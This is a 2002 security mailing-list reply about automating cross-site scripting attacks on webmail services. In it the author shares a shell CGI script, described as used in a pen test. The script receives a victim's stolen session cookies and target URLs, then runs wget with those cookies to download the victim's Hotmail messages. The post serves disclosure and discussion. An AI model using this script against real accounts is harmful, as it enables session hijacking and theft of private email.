Re: Evolution of Cross-Site Scripting Attacks

From: FozZy (fozzyat_private)
Date: Mon May 20 2002 - 12:50:06 PDT

    Great ! This article is a very good explanation of how to set-up an attack against web apps by using XSS.

    However, it is not really a "prediction" of a new type of attack: several people (including me ;) have pointed out in the past on this mailing-list that attacks against webmails can be easily automated by a script.  Here is a very lame shell cgi I used for a pen test against a hotmail account:

    $ cat /var/www/cgi-bin/recupmail.cgi
    #!/bin/sh
    echo Content-type: text/plain
    echo

    set -f
    URL=`echo $QUERY_STRING | cut -d '*' -f 1 | cut -d '&' -f -2`
    URL_MESSAGE=`echo $QUERY_STRING | cut -d '*' -f 1`
    COOKIES=`echo $QUERY_STRING | cut -d '*' -f 2 | /usr/local/sbin/urldecode.sh`
    echo URL = $URL
    echo COOKIES = $COOKIES
    cd /home/fozzy/tmp/hotmail
    nohup wget -b --user-agent='Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; BVRP Software)' -r -l 1 -o /tmp/recupmail.log --header="Cookie: $COOKIES" -nd $URL &
    nohup wget -b --user-agent='Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; BVRP Software)' -r -l 1 -o /tmp/recupmail.log --header="Cookie: $COOKIES" -nd $URL_MESSAGE &

    I also used php scripts to prove that i could crack into my accounts on many french webmails 7 months ago. Everything was published in a french newspaper (Hackerz Voice) but I did not put it on the web cause i fear script-kiddies, and the code is not really interesting (it is quite straight-forward).
    If I was able to do that, surely many other people did the same thing. So, I am sure it is exploited "in the wild" since a long time. :(

    BTW, two weeks ago, Hotmail and Yahoo was still vulnerable to XSS...

    FozZy

    Hackademy / Hackerz Voice
    http://www.dmpfrance.com